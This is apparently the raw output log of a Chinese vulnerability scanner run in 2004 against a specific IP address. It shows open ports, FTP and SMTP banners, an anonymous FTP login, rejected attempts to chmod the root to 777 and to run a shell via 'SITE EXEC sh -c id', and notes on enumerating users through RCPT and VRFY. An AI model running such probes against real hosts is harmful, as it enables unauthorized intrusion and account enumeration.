:-)h0les Scanner:-)
扫描选项: 219.138.8.149
FTP漏洞
SMTP漏洞
FINGER漏洞
CGI漏洞
IIS漏洞
RPC漏洞
查询share
查询USERS
查询GROUPS
查询TRANSPORTS
查询DATETIME
查询SERVICES
查询SESSIONS
查询REGISTRY
查询MORE
启动h0lescaner v4skyss 漏洞扫描引擎...开始扫描......
目标IP地址为: 219.138.8.149
扫描目标主机开放的端口:
21号端口(ftp)开放!
25号端口(smtp)开放!
80号端口(http)开放!
119号端口(nntp)开放!
443号端口(https)开放!
1026号端口(未知)开放!
1433号端口(ms-sql-s)开放!
3389号端口(未知)开放!
8080号端口(未知)开放!
开始扫描FTP漏洞:
FTP服务器的Banner:
220 100ln Microsoft FTP Service (Version 5.0).
测试匿名用户
230 Anonymous user logged in.
根目录列表:
150 Opening ASCII mode data connection for /bin/ls.
尝试改变主目录属性为可写:
425 Can't open data connection.
尝试建立目录:
500 'SITE chmod 777 /': command not understood
550 ftpbug: Access is denied.
尝试执行Shell:
500 'SITE EXEC sh -c id': command not understood
开始扫描SMTP漏洞:
SMTP服务器的Banner:
220 100ln Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Thu, 8 Jul 2004 01:31:12 +0800
214-This server supports the following commands:
214 HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH TURN ATRN ETRN BDAT VRFY
可以使用RCPT命令获得用户名列表.
可以使用VRFY命令获得用户名列表.